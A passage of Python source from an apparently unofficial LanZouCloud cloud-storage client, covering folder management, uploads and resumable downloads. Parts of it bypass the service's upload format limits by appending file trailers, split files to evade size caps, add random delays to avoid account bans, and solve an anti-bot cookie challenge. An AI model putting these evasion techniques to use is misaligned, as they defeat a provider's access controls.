name = file_info.json()['text'] # 无后缀的文件名(获得后缀又要发送请求,没有就没有吧,尽可能减少请求数量)
desc = file_info.json()['info']
else:
url = f_info['new_url'] # 文件夹的分享链接可以直接拿到
name = f_info['name'] # 文件夹名
desc = f_info['des'] # 文件夹描述
return ShareInfo(LanZouCloud.SUCCESS, name=name, url=url, desc=desc, pwd=pwd)
def set_passwd(self, fid, passwd='', is_file=True) -> int:
"""
设置网盘文件(夹)的提取码, 现在非会员用户不允许关闭提取码
id 无效或者 id 类型不对应仍然返回成功 :(
文件夹提取码长度 0-12 位 文件提取码 2-6 位
"""
passwd_status = 0 if passwd == '' else 1 # 是否开启密码
if is_file:
post_data = {"task": 23, "file_id": fid, "shows": passwd_status, "shownames": passwd}
else:
post_data = {"task": 16, "folder_id": fid, "shows": passwd_status, "shownames": passwd}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
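        # Illustrative calls only:
        #   lzy.set_passwd(file_id, 'a1b2')                      # file code, 2-6 characters
        #   lzy.set_passwd(folder_id, 'secret', is_file=False)   # folder code, 0-12 characters
        #   lzy.set_passwd(file_id, '')                          # empty string asks to disable the code (VIP only)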
def mkdir(self, parent_id, folder_name, desc='') -> int:
"""创建文件夹(同时设置描述)"""
folder_name = folder_name.replace(' ', '_') # 文件夹名称不能包含空格
folder_name = name_format(folder_name) # 去除非法字符
folder_list, _ = self.get_dir_list(parent_id)
if folder_list.find_by_name(folder_name): # 如果文件夹已经存在,直接返回 id
return folder_list.find_by_name(folder_name).id
raw_folders = self.get_move_folders()
post_data = {"task": 2, "parent_id": parent_id or -1, "folder_name": folder_name,
"folder_description": desc}
result = self._post(self._doupload_url, post_data) # 创建文件夹
if not result or result.json()['zt'] != 1:
logger.debug(f"Mkdir {folder_name} error, parent_id={parent_id}")
return LanZouCloud.MKDIR_ERROR # 正常时返回 id 也是 int,为了方便判断是否成功,网络异常或者创建失败都返回相同错误码
# 允许再不同路径创建同名文件夹, 移动时可通过 get_move_paths() 区分
for folder in self.get_move_folders():
if not raw_folders.find_by_id(folder.id):
logger.debug(f"Mkdir {folder_name} #{folder.id} in parent_id={parent_id}")
return folder.id
logger.debug(f"Mkdir {folder_name} error, parent_id={parent_id}")
return LanZouCloud.MKDIR_ERROR
def _set_dir_info(self, folder_id, folder_name, desc='') -> int:
"""重命名文件夹及其描述"""
# 不能用于重命名文件,id 无效仍然返回成功
folder_name = name_format(folder_name)
post_data = {'task': 4, 'folder_id': folder_id, 'folder_name': folder_name, 'folder_description': desc}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def rename_dir(self, folder_id, folder_name) -> int:
"""重命名文件夹"""
# 重命名文件要开会员额
info = self.get_share_info(folder_id, is_file=False)
if info.code != LanZouCloud.SUCCESS:
return info.code
return self._set_dir_info(folder_id, folder_name, info.desc)
def set_desc(self, fid, desc, is_file=True) -> int:
"""设置文件(夹)描述"""
if is_file:
# 文件描述一旦设置了值,就不能再设置为空
post_data = {'task': 11, 'file_id': fid, 'desc': desc}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
elif result.json()['zt'] != 1:
return LanZouCloud.FAILED
return LanZouCloud.SUCCESS
else:
# 文件夹描述可以置空
info = self.get_share_info(fid, is_file=False)
if info.code != LanZouCloud.SUCCESS:
return info.code
return self._set_dir_info(fid, info.name, desc)
def rename_file(self, file_id, filename):
"""允许会员重命名文件(无法修后缀名)"""
post_data = {'task': 46, 'file_id': file_id, 'file_name': name_format(filename), 'type': 2}
result = self._post(self._doupload_url, post_data)
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def get_move_folders(self) -> FolderList:
"""获取全部文件夹 id-name 列表,用于移动文件至新的文件夹"""
# 这里 file_id 可以为任意值,不会对结果产生影响
result = FolderList()
result.append(FolderId(name='LanZouCloud', id=-1, desc="", now=0))
resp = self._post(self._doupload_url, data={"task": 19, "file_id": -1})
if not resp or resp.json()['zt'] != 1: # 获取失败或者网络异常
return result
info = resp.json()['info'] or [] # 新注册用户无数据, info=None
for folder in info:
folder_id, folder_name = int(folder['folder_id']), folder['folder_name']
result.append(FolderId(folder_name, folder_id, "", ""))
return result
def get_move_paths(self) -> List[FolderList]:
"""获取所有文件夹的绝对路径(耗时长)"""
result = []
root = FolderList()
root.append(FolderId('LanZouCloud', -1))
result.append(root)
resp = self._post(self._doupload_url, data={"task": 19, "file_id": -1})
if not resp or resp.json()['zt'] != 1: # 获取失败或者网络异常
return result
ex = ThreadPoolExecutor() # 线程数 min(32, os.cpu_count() + 4)
id_list = [int(folder['folder_id']) for folder in resp.json()['info']]
task_list = [ex.submit(self.get_full_path, fid) for fid in id_list]
for task in as_completed(task_list):
result.append(task.result())
return sorted(result)
def move_file(self, file_id, folder_id=-1) -> int:
"""移动文件到指定文件夹"""
# 移动回收站文件也返回成功(实际上行不通) (+_+)?
post_data = {'task': 20, 'file_id': file_id, 'folder_id': folder_id}
result = self._post(self._doupload_url, post_data)
logger.debug(f"Move file file_id={file_id} to folder_id={folder_id}")
if not result:
return LanZouCloud.NETWORK_ERROR
return LanZouCloud.SUCCESS if result.json()['zt'] == 1 else LanZouCloud.FAILED
def move_folder(self, folder_id: int, parent_folder_id: int=-1) -> int:
"""移动文件夹(官方并没有直接支持此功能)"""
if folder_id == parent_folder_id or parent_folder_id < -1:
return LanZouCloud.FAILED # 禁止移动文件夹到自身,禁止移动到 -2 这样的文件夹(文件还在,但是从此不可见)
folder = self.get_move_folders().find_by_id(folder_id)
if not folder:
logger.debug(f"Not found folder :folder_id={folder_id}")
return LanZouCloud.FAILED
_folders, _ = self.get_dir_list(folder_id)
if _folders:
logger.debug(f"Found subdirectory in folder={folder}")
return LanZouCloud.FAILED # 递归操作可能会产生大量请求,这里只移动单层文件夹
info = self.get_share_info(folder_id, False)
new_folder_id = self.mkdir(parent_folder_id, folder.name, info.desc) # 在目标文件夹下创建同名文件夹
if new_folder_id == LanZouCloud.MKDIR_ERROR:
return LanZouCloud.FAILED
elif new_folder_id == folder_id: # 移动文件夹到同一目录
return LanZouCloud.FAILED
self.set_passwd(new_folder_id, info.pwd, False) # 保持密码相同
ex = ThreadPoolExecutor()
task_list = [ex.submit(self.move_file, file.id, new_folder_id) for file in self.get_file_list(folder_id)]
for task in as_completed(task_list):
if task.result() != LanZouCloud.SUCCESS:
return LanZouCloud.FAILED
self.delete(folder_id, False) # 全部移动完成后删除原文件夹
self.delete_rec(folder_id, False)
return LanZouCloud.SUCCESS
def _upload_small_file(self, task, file_path, folder_id=-1, callback=None) -> Tuple[int, int, bool]:
"""绕过格式限制上传不超过 max_size 的文件"""
if not os.path.isfile(file_path):
return LanZouCloud.PATH_ERROR, 0, True
need_delete = False # 上传完成是否删除
if not is_name_valid(os.path.basename(file_path)): # 不允许上传的格式
file_path = let_me_upload(file_path) # 添加了报尾的新文件
need_delete = True
# 文件已经存在同名文件就删除
filename = name_format(os.path.basename(file_path))
file_list = self.get_file_list(folder_id)
if file_list.find_by_name(filename):
self.delete(file_list.find_by_name(filename).id)
logger.debug(f'Upload file file_path={file_path} to folder_id={folder_id}')
file_ = open(file_path, 'rb')
post_data = {
"task": "1",
"folder_id": str(folder_id),
"id": "WU_FILE_0",
"name": filename,
"upload_file": (filename, file_, 'application/octet-stream')
}
post_data = MultipartEncoder(post_data)
tmp_header = self._headers.copy()
tmp_header['Content-Type'] = post_data.content_type
# MultipartEncoderMonitor 每上传 8129 bytes数据调用一次回调函数,问题根源是 httplib 库
# issue : https://github.com/requests/toolbelt/issues/75
# 上传完成后,回调函数会被错误的多调用一次(强迫症受不了)。因此,下面重新封装了回调函数,修改了接受的参数,并阻断了多余的一次调用
self._upload_finished_flag = False # 上传完成的标志
start_size = task.now_size
logger.debug(f"upload small file: start_size={start_size}")
def _call_back(read_monitor):
if callback is not None:
if not self._upload_finished_flag:
task.now_size = start_size + read_monitor.bytes_read
callback()
if read_monitor.len == read_monitor.bytes_read:
self._upload_finished_flag = True
monitor = MultipartEncoderMonitor(post_data, _call_back)
result = self._post('https://pc.woozooo.com/fileup.php', monitor, headers=tmp_header, timeout=None)
if not result: # 网络异常
logger.debug('Upload file no result')
return LanZouCloud.NETWORK_ERROR, 0, True
else:
if result.status_code == 413:
logger.error(f"Upload file too Large: {result.text}")
return LanZouCloud.FAILED, 0, True # 文件超过限制, 上传失败
result = result.json()
if result["zt"] != 1:
logger.debug(f'Upload failed: result={result}')
return LanZouCloud.FAILED, 0, True # 上传失败
file_id = result["text"][0]["id"]
self.set_passwd(file_id) # 文件上传后默认关闭提取码
            file_.close()  # always release the file handle, not only when the temporary copy is deleted
            if need_delete:
                os.remove(file_path)
            return LanZouCloud.SUCCESS, int(file_id), True
def _upload_big_file(self, task: object, file_path, dir_id, callback=None):
"""上传大文件, 且使得回调函数只显示一个文件"""
file_size = os.path.getsize(file_path) # 原始文件的字节大小
file_name = os.path.basename(file_path)
tmp_dir = os.path.dirname(file_path) + os.sep + '__' + '.'.join(file_name.split('.')[:-1]) # 临时文件保存路径
record_file = tmp_dir + os.sep + file_name + '.record' # 记录文件,大文件没有完全上传前保留,用于支持续传
uploaded_size = 0 # 记录已上传字节数,用于回调函数
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if not os.path.exists(record_file): # 初始化记录文件
info = {'name': file_name, 'size': file_size, 'uploaded': 0, 'parts': []}
with open(record_file, 'wb') as f:
pickle.dump(info, f, protocol=4)
else:
with open(record_file, 'rb') as f:
info = pickle.load(f)
uploaded_size = info['uploaded'] # 读取已经上传的大小
logger.debug(f"Find upload record: {uploaded_size}/{file_size}")
# def _callback(now_size): # 重新封装回调函数,隐藏数据块上传细节
# nonlocal uploaded_size
# if callback is not None:
# # MultipartEncoder 以后,文件数据流比原文件略大几百字节, now_size 略大于 file_size
# now_size = uploaded_size + now_size
# task.now_size = now_size if now_size < task.total_size else task.total_size # 99.99% -> 100.00%
# callback()
while uploaded_size < file_size:
data_size, data_path = big_file_split(file_path, self._max_size, start_byte=uploaded_size)
code, _, _ = self._upload_small_file(task, data_path, dir_id, callback)
if code == LanZouCloud.SUCCESS:
uploaded_size += data_size # 更新已上传的总字节大小
info['uploaded'] = uploaded_size
info['parts'].append(os.path.basename(data_path)) # 记录已上传的文件名
with open(record_file, 'wb') as f:
logger.debug(f"Update record file: {uploaded_size}/{file_size}")
pickle.dump(info, f, protocol=4)
else:
logger.debug(f"Upload data file failed: code={code}, data_path={data_path}")
return LanZouCloud.FAILED, 0, False
os.remove(data_path) # 删除临时数据块
min_s, max_s = self._upload_delay # 设置两次上传间的延时,减小封号可能性
sleep_time = uniform(min_s, max_s)
logger.debug(f"Sleeping, Upload task will resume after {sleep_time:.2f}s...")
sleep(sleep_time)
# 全部数据块上传完成
record_name = list(file_name.replace('.', '')) # 记录文件名也打乱
shuffle(record_name)
record_name = name_format(''.join(record_name)) + '.txt'
record_file_new = tmp_dir + os.sep + record_name
os.rename(record_file, record_file_new)
code, _, _ = self._upload_small_file(task, record_file_new, dir_id, callback) # 上传记录文件
if code != LanZouCloud.SUCCESS:
logger.error(f"Upload record file failed: code={code}, record_file={record_file_new}")
return LanZouCloud.FAILED, 0, False
# 记录文件上传成功,删除临时文件
shutil.rmtree(tmp_dir)
logger.debug(f"Upload finished, Delete tmp folder:{tmp_dir}")
return LanZouCloud.SUCCESS, int(dir_id), False # 大文件返回文件夹id
def upload_file(self, task: object, file_path, folder_id=-1, callback=None, allow_big_file=False) -> Tuple[int, int, bool]:
"""解除限制上传文件"""
if not os.path.isfile(file_path):
return LanZouCloud.PATH_ERROR, 0, True
file_size = os.path.getsize(file_path)
if file_size == 0: # 空文件无法上传
return LanZouCloud.FAILED, 0, False
elif file_size <= self._max_size * 1048576: # 单个文件不超过 max_size 直接上传
return self._upload_small_file(task, file_path, folder_id, callback)
elif not allow_big_file:
logger.debug(f'Forbid upload big file!file_path={file_path}, max_size={self._max_size}')
task.info = f"文件大于{self._max_size}MB" # LanZouCloud.OFFICIAL_LIMITED
return LanZouCloud.OFFICIAL_LIMITED, 0, False # 不允许上传超过 max_size 的文件
# 上传超过 max_size 的文件
folder_name = os.path.basename(file_path) # 保存分段文件的文件夹名
dir_id = self.mkdir(folder_id, folder_name, 'Big File')
if dir_id == LanZouCloud.MKDIR_ERROR:
return LanZouCloud.MKDIR_ERROR, 0, False # 创建文件夹失败就退出
return self._upload_big_file(task, file_path, dir_id, callback)
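        # Illustrative summary of the big-file workaround (see _upload_big_file above and
        # _check_big_file below): a file larger than max_size is stored as a cloud folder
        # named after the file, containing the uploaded chunks plus a shuffled-name .txt
        # record file; the download side recognises that .txt, deserialises it and stitches
        # the chunks back together in order.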
def upload_dir(self, task: object, callback, allow_big_file=False):
# dir_path, folder_id=-1, callback=None, failed_callback=None, allow_big_file=False):
"""批量上传文件夹中的文件(不会递归上传子文件夹)
:param folder_id: 网盘文件夹 id
:param dir_path: 文件夹路径
:param callback (filename, total_size, now_size) 用于显示进度
:param failed_callback (code, file) 用于处理上传失败的文件
"""
if not os.path.isdir(task.url):
task.info = LanZouCloud.PATH_ERROR
return LanZouCloud.PATH_ERROR, None, False
dir_name = os.path.basename(task.url)
dir_id = self.mkdir(task.fid, dir_name, '批量上传')
if dir_id == LanZouCloud.MKDIR_ERROR:
task.info = LanZouCloud.MKDIR_ERROR
return LanZouCloud.MKDIR_ERROR, None, False
# the default value of task.current is 1
task.current = 0
for filename in os.listdir(task.url):
file_path = task.url + os.sep + filename
if not os.path.isfile(file_path):
continue # 跳过子文件夹
task.current += 1
code, _, _ = self.upload_file(task, file_path, dir_id, callback=callback,
allow_big_file=allow_big_file)
# if code != LanZouCloud.SUCCESS:
# if failed_callback is not None:
# failed_callback(code, filename)
return LanZouCloud.SUCCESS, dir_id, False
def down_file_by_url(self, share_url, task: object, callback) -> int:
"""通过分享链接下载文件(需提取码)"""
if not is_file_url(share_url):
task.info = LanZouCloud.URL_INVALID
return LanZouCloud.URL_INVALID
if not os.path.exists(task.path):
os.makedirs(task.path)
logger.error(f'down_file_by_url: {share_url}')
info = self.get_durl_by_url(share_url, task.pwd)
logger.error(f'down_file_by_url: {info}')
if info.code != LanZouCloud.SUCCESS:
task.info = info.code
logger.error(f'File direct url info: {info}')
return info.code
resp = self._get(info.durl, stream=True)
if not resp:
task.info = LanZouCloud.NETWORK_ERROR
return LanZouCloud.NETWORK_ERROR
# 对于 txt 文件, 可能出现没有 Content-Length 的情况
# 此时文件需要下载一次才会出现 Content-Length
# 这时候我们先读取一点数据, 再尝试获取一次, 通常只需读取 1 字节数据
content_length = resp.headers.get('Content-Length', None)
if not content_length:
data_iter = resp.iter_content(chunk_size=1)
max_retries = 5 # 5 次拿不到就算了
while not content_length and max_retries > 0:
max_retries -= 1
logger.warning("Not found Content-Length in response headers")
logger.debug("Read 1 byte from stream...")
try:
next(data_iter) # 读取一个字节
except StopIteration:
logger.debug("Please wait for a moment before downloading")
return LanZouCloud.FAILED
resp_ = self._get(info.durl, stream=True) # 再请求一次试试
if not resp_:
return LanZouCloud.FAILED
content_length = resp_.headers.get('Content-Length', None)
logger.debug(f"Content-Length: {content_length}")
total_size = int(content_length)
if share_url == task.url: # 下载单文件
task.total_size = total_size
file_path = task.path + os.sep + info.name.replace("*", "_") # 替换文件名中的 *
logger.debug(f'Save file to file_path={file_path}')
now_size = 0
if os.path.exists(file_path):
now_size = os.path.getsize(file_path) # 本地已经下载的文件大小
task.now_size += now_size
callback()
if now_size >= total_size:
logger.debug(f'File file_path={file_path} local already exist!')
return LanZouCloud.SUCCESS
        chunk_size = 1024 * 64  # 64 KiB per chunk
        last_512_bytes = b''  # used to detect whether the file tail carries real-filename metadata
headers = {**self._headers, 'Range': 'bytes=%d-' % now_size}
resp = self._get(info.durl, stream=True, headers=headers, timeout=None)
if resp is None: # 网络异常
task.info = LanZouCloud.NETWORK_ERROR
return LanZouCloud.FAILED
if resp.status_code == 416: # 已经下载完成
logger.debug('File download finished!')
return LanZouCloud.SUCCESS
logger.debug(f'File downloading file_path={file_path} ...')
with open(file_path, "ab") as f:
for chunk in resp.iter_content(chunk_size):
if chunk:
f.write(chunk)
f.flush()
now_size += len(chunk)
task.now_size += len(chunk)
callback()
if total_size - now_size < 512:
last_512_bytes += chunk
# 尝试解析文件报尾
file_info = un_serialize(last_512_bytes[-512:])
if file_info is not None and 'padding' in file_info: # 大文件的记录文件也可以反序列化出 name,但是没有 padding
real_name = file_info['name']
new_file_path = task.path + os.sep + real_name
logger.debug(f"Find meta info: real_name={real_name}")
if os.path.exists(new_file_path):
os.remove(new_file_path) # 存在同名文件则删除
os.rename(file_path, new_file_path)
with open(new_file_path, 'rb+') as f:
truncate_size = 512
f.seek(-truncate_size, os.SEEK_END)
f.truncate()
return LanZouCloud.SUCCESS
    def get_folder_info_by_url(self, share_url, dir_pwd='') -> FolderDetail:
        """Get the information of every file inside a shared folder"""
share_url = re.sub(r"lanzou(\w)", "lanzoub", share_url)
if is_file_url(share_url):
return FolderDetail(LanZouCloud.URL_INVALID)
try:
html = requests.get(share_url, headers=self._headers).text
except requests.RequestException as e:
logger.error(f"requests error: {e}")
return FolderDetail(LanZouCloud.NETWORK_ERROR)
if any(item in html for item in ["文件不存在", "文件取消分享了"]):
return FolderDetail(LanZouCloud.FILE_CANCELLED)
if ('id="pwdload"' in html or 'id="passwddiv"' in html or '请输入密码' in html) and len(dir_pwd) == 0:
return FolderDetail(LanZouCloud.LACK_PASSWORD)
if "acw_sc__v2" in html:
# 在页面被过多访问或其他情况下,有时候会先返回一个加密的页面,其执行计算出一个acw_sc__v2后放入页面后再重新访问页面才能获得正常页面
# 若该页面进行了js加密,则进行解密,计算acw_sc__v2,并加入cookie
acw_sc__v2 = calc_acw_sc__v2(html)
self._session.cookies.set("acw_sc__v2", acw_sc__v2)
logger.debug(f"Set Cookie: acw_sc__v2={acw_sc__v2}")
html = self._get(share_url).text # 文件分享页面(第一页)
try:
# 获取文件需要的参数
html = remove_notes(html)
lx = re.findall(r"'lx':'?(\d)'?,", html)[0]
t = re.findall(r"var [0-9a-z]{6} = '(\d{10})';", html)[0]
k = re.findall(r"var [0-9a-z]{6} = '([0-9a-z]{15,})';", html)[0]
# 文件夹的信息
folder_id = re.findall(r"'fid':'?(\d+)'?,", html)[0]
folder_name = re.search(r"var.+?='(.+?)';\n.+document.title", html) or \
re.search(r'user-title">(.+?)</div>', html) or \
re.search(r'<div class="b">(.+?)<div', html) # 会员自定义
folder_name = folder_name.group(1) if folder_name else ''
folder_time = re.search(r'class="rets">([\d\-]+?)<a', html) # 日期不全 %m-%d
folder_time = folder_time.group(1) if folder_time else ''
folder_desc = re.search(r'id="filename">(.+?)</span>', html, re.DOTALL) or \
re.search(r'<div class="user-radio-\d"></div>(.+?)</div>', html) or \
re.search(r'class="teta tetb">说</span>(.+?)</div><div class="d2">', html, re.DOTALL)
folder_desc = folder_desc.group(1) if folder_desc else ''
except IndexError:
logger.error("IndexError")
return FolderDetail(LanZouCloud.FAILED)
# 提取子文件夹信息(vip用户分享的文件夹可以递归包含子文件夹)
sub_folders = FolderList()
# 文件夹描述放在 filesize 一栏, 迷惑行为
all_sub_folders = re.findall(
r'mbxfolder"><a href="(.+?)".+class="filename">(.+?)<div class="filesize">(.*?)</div>', html)
for url, _, _ in all_sub_folders:
url = self._host_url + url
            sub_folder_detail = self.get_folder_info_by_url(url, dir_pwd)
            sub_folders.append(sub_folder_detail)
# 提取改文件夹下全部文件
page = 1
files = FileList()
while True:
try:
post_data = {'lx': lx, 'pg': page, 'k': k, 't': t, 'fid': folder_id, 'pwd': dir_pwd}
resp = self._post(self._host_url + '/filemoreajax.php', data=post_data, headers=self._headers).json()
except requests.RequestException:
return FolderDetail(LanZouCloud.NETWORK_ERROR)
if resp['zt'] == 1: # 成功获取一页文件信息
for f in resp["text"]:
name = f['name_all'].replace("&amp;", "&")
if "*" in name:
logger.debug(f"Having unexpected file: id={f['id']}, name={name}")
if str(f["id"]).startswith('i'): # 去除不以 i 开头的文件链接
files.append(FileInFolder(
name=name,  # file name
time=f["time"],  # upload time
size=f["size"].replace(",", ""),  # file size
type=f["name_all"].split('.')[-1],  # file extension
url=self._host_url + "/" + f["id"]  # file share link
))
page += 1  # next page
continue
elif resp['zt'] == 2:  # all file info has been fetched
break
elif resp['zt'] == 3:  # wrong extraction password
return FolderDetail(LanZouCloud.PASSWORD_ERROR)
elif resp["zt"] == 4:
continue
else:
return FolderDetail(LanZouCloud.FAILED)  # other unknown error
# Fill in the folder's year from the files' timestamps (if there are any files)
if files:  # the last file was uploaded earliest, so the folder was created in the same year
if folder_time:
folder_time = files[-1].time.split('-')[0] + '-' + folder_time
else:  # no partial date on the page, fall back to that file's full date
folder_time = files[-1].time
size_int = sum_files_size(files)
count = len(files)
else:  # no files at all, just use today's date
folder_time = datetime.today().strftime('%Y-%m-%d')
size_int = count = 0
for sub_folder in sub_folders:  # propagate sub-folder size and count up to the parent folder
size_int += sub_folder.folder.size_int
count += sub_folder.folder.count
folder_size = convert_file_size_to_str(size_int)
this_folder = FolderInfo(folder_name, folder_id, dir_pwd, folder_time,
folder_desc, share_url, folder_size, size_int, count)
return FolderDetail(LanZouCloud.SUCCESS, folder=this_folder, files=files, sub_folders=sub_folders)
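# Usage sketch for get_folder_info_by_url (an authenticated LanZouCloud instance `lzy`, the share
# link and the password below are placeholders, not values taken from this file):
#
#     lzy = LanZouCloud()
#     detail = lzy.get_folder_info_by_url('https://example.lanzoub.com/b0abc123', dir_pwd='1234')
#     if detail.code == LanZouCloud.SUCCESS:
#         for f in detail.files:
#             print(f.name, f.size, f.url)
#         for sub in detail.sub_folders:   # sub-folders are themselves FolderDetail objects
#             print(sub.folder.name, sub.folder.count)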
def get_folder_info_by_id(self, folder_id):
"""通过 id 获取文件夹及内部文件信息"""
info = self.get_share_info(folder_id, is_file=False)
if info.code != LanZouCloud.SUCCESS:
return FolderDetail(info.code)
return self.get_folder_info_by_url(info.url, info.pwd)
def _check_big_file(self, file_list):
"""检查文件列表,判断是否为大文件分段数据"""
txt_files = file_list.filter(lambda f: f.name.endswith('.txt') and 'M' not in f.size)
if txt_files and len(txt_files) == 1: # 文件夹里有且仅有一个 txt, 很有可能是保存大文件的文件夹
try:
info = self.get_durl_by_url(txt_files[0].url)
except AttributeError:
info = self.get_durl_by_id(txt_files[0].id)
if info.code != LanZouCloud.SUCCESS:
logger.error("Big file checking: Failed")
return None
resp = self._get(info.durl)
# No need to know the txt file's Content-Length here, just read the whole body
info = un_serialize(resp.content) if resp else None
if info is not None:  # confirmed: this is a big file
name, size, *_, parts = info.values()  # real file name, size in bytes, (other data), ordered segment file names
file_list = [file_list.find_by_name(p) for p in parts]
if all(file_list):  # every segment is present
logger.debug(f"Big file checking: PASS , name={name}, size={size}")
return name, size, file_list
logger.debug("Big file checking: Failed, Missing some data")
logger.debug("Big file checking: Failed")
return None
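# What _check_big_file expects, as a sketch: the single .txt file deserializes into a dict-like
# record whose values are (real name, byte size, ..., ordered segment names). The key names below
# are an illustration only; the code above relies solely on the value order.
#
#     record = {'name': 'movie.mkv', 'size': 1073741824,
#               'parts': ['movie.mkv.001.enc', 'movie.mkv.002.enc']}
#     name, size, *_, parts = record.values()   # same unpacking as in _check_big_file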
def _down_big_file(self, name, total_size, file_list, task: object, callback):
"""下载分段数据到一个文件,回调函数只显示一个文件
支持大文件下载续传,下载完成后重复下载不会执行覆盖操作,直接返回状态码 SUCCESS
"""
big_file = task.path + os.sep + name
record_file = big_file + '.record'
if not os.path.exists(task.path):
os.makedirs(task.path)
if not os.path.exists(record_file):  # initialise the record file
info = {'last_ending': 0, 'finished': []}  # end offset of the previous segment and the segments already downloaded
with open(record_file, 'wb') as rf:
pickle.dump(info, rf, protocol=4)
else:  # read the record file and resume the download
with open(record_file, 'rb') as rf:
info = pickle.load(rf)
file_list = [f for f in file_list if f.name not in info['finished']]  # skip segments that are already downloaded
logger.debug(f"Find download record file: {info}")
task.total_size = total_size
if os.path.exists(big_file):
now_size = os.path.getsize(big_file)  # size already downloaded locally
task.now_size += now_size
if callback is not None:
callback()
if now_size >= total_size:
logger.debug(f'File file_path={big_file} already exists locally!')
# all segments are downloaded, the record file can be removed
logger.debug(f"Delete download record file: {record_file}")
os.remove(record_file)
return LanZouCloud.SUCCESS
with open(big_file, 'ab') as bf:
for file in file_list:
try:
durl_info = self.get_durl_by_url(file.url)  # segment files have no password
except AttributeError:
durl_info = self.get_durl_by_id(file.id)
if durl_info.code != LanZouCloud.SUCCESS:
logger.debug(f"Can't get direct url: {file}")
return durl_info.code
# prepare to append data to the big file
file_size_now = os.path.getsize(big_file)
down_start_byte = file_size_now - info['last_ending']  # offset inside the current segment where the last download stopped
headers = {**self._headers, 'Range': 'bytes=%d-' % down_start_byte}
logger.debug(f"Download {file.name}, Range: {down_start_byte}-")
resp = self._get(durl_info.durl, stream=True, headers=headers)
if resp is None:  # network error, no response data
return LanZouCloud.FAILED
if resp.status_code == 416:  # re-downloading a finished file makes the Range exceed the file, so the server returns 416
logger.debug(f"File {name} has already been downloaded.")
os.remove(record_file)  # remove the record file
return LanZouCloud.SUCCESS
try:
for chunk in resp.iter_content(4096):
if chunk:
file_size_now += len(chunk)
bf.write(chunk)
bf.flush()  # flush to disk immediately, otherwise the file size read on the next write would be off
task.now_size = file_size_now
callback()
# one segment fully written, update the record file
info['finished'].append(file.name)
finally:
info['last_ending'] = file_size_now
with open(record_file, 'wb') as rf:
pickle.dump(info, rf, protocol=4)
logger.debug(f"Update download record info: {info}")
# all segments downloaded, the record file can be removed
logger.debug(f"Delete download record file: {record_file}")
os.remove(record_file)
return LanZouCloud.SUCCESS
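# Resume-record sketch: the .record file sits next to the big file and is a pickled dict. A minimal
# illustration (the path below is a placeholder):
#
#     import pickle
#     with open('/tmp/movie.mkv.record', 'rb') as rf:
#         info = pickle.load(rf)
#     # info == {'last_ending': 52428800, 'finished': ['movie.mkv.001.enc']}
#     # 'last_ending' is the byte offset in the big file where the previous finished segment ends,
#     # so the next Range request starts os.path.getsize(big_file) - info['last_ending'] bytes into
#     # the current segment.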
def down_dir_by_url(self, task: object, callback, parent_dir="") -> int:
"""通过分享链接下载文件夹"""
folder_detail = self.get_folder_info_by_url(task.url, task.pwd)
if folder_detail.code != LanZouCloud.SUCCESS:  # failed to fetch the folder info
task.info = folder_detail.code
return folder_detail.code
# check whether this folder holds big-file segment data
info = self._check_big_file(folder_detail.files)
if info is not None:
return self._down_big_file(*info, task, callback)
if parent_dir:  # recursive download into a sub-folder
task.path = parent_dir + os.sep + folder_detail.folder.name
else:  # top-level folder
task.path = task.path + os.sep + folder_detail.folder.name
task.total_file = folder_detail.folder.count
task.total_size = folder_detail.folder.size_int
# create the sub-folder automatically
if not os.path.exists(task.path):
task.path = task.path.replace('*', '_')  # replace special characters so the path is valid
os.makedirs(task.path)
# not big-file segment data, download the files directly
task.size = folder_detail.folder.size
for index, file in enumerate(folder_detail.files, start=1):
task.current = index
code = self.down_file_by_url(file.url, task, callback)
if code != LanZouCloud.SUCCESS:
logger.error(f'Download file result: Code:{code}, File: {file}')
# if failed_callback is not None:
# failed_callback(code, file)
# recursively download sub-folders, if any
parent_dir = task.path
if folder_detail.sub_folders:
for sub_folder in folder_detail.sub_folders:
task.url = sub_folder.url
self.down_dir_by_url(task, callback, parent_dir)
task.rate = 1000
return LanZouCloud.SUCCESS
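# down_dir_by_url drives everything through a mutable `task` object. A minimal stand-in that
# provides the attributes read and written above (this helper class is an assumption, not part of
# the library API):
#
#     class _Task:
#         def __init__(self, url, pwd, path):
#             self.url, self.pwd, self.path = url, pwd, path
#             self.total_file = self.total_size = self.now_size = 0
#             self.current = self.rate = 0
#             self.size = ''
#             self.info = None
#
#     # lzy.down_dir_by_url(_Task('https://example.lanzoub.com/b0abc123', '1234', '/tmp'), callback=lambda: None)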
# ------------------------------------------------------------------------- #
def set_timeout(self, timeout):
self._timeout = timeout
def get_share_info_by_url(self, f_url, pwd="") -> ShareInfo:
"""获取分享文件信息 和 get_file_info_by_url 类似,少一个下载直链"""
f_url = re.sub(r"lanzou(\w)", "lanzoub", f_url)
if not is_file_url(f_url):
return ShareInfo(LanZouCloud.URL_INVALID)
first_page = self._get(f_url)  # file share page (first page)
if not first_page:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
first_page = remove_notes(first_page.text)  # strip the HTML comments from the page
if '文件取消' in first_page or '文件不存在' in first_page:
return ShareInfo(LanZouCloud.FILE_CANCELLED)
if ('id="pwdload"' in first_page or 'id="passwddiv"' in first_page or "输入密码" in first_page): # 文件设置了提取码时
if len(pwd) == 0:
return ShareInfo(LanZouCloud.LACK_PASSWORD)
f_size = re.search(r'class="n_filesize">[^<0-9]*([\.0-9 MKBmkbGg]+)<', first_page)
f_size = f_size.group(1) if f_size else ""
f_time = re.search(r'class="n_file_infos">([-0-9 :月天小时分钟秒前]+)<', first_page)
f_time = f_time.group(1) if f_time else ""
f_desc = re.search(r'class="n_box_des">(.*)<', first_page)
f_desc = f_desc.group(1) if f_desc else ""
sign = re.search(r"sign=(\w+?)&", first_page).group(1)
post_data = {'action': 'downprocess', 'sign': sign, 'p': pwd}
link_info = self._post(self._host_url + '/ajaxm.php', post_data)  # holds the pre-redirect link info and the file name
second_page = self._get(f_url)  # request the share page again; it now shows the file name, time, size etc. (second page)
if not link_info or not second_page.text:
return ShareInfo(LanZouCloud.NETWORK_ERROR)
second_page = second_page.text
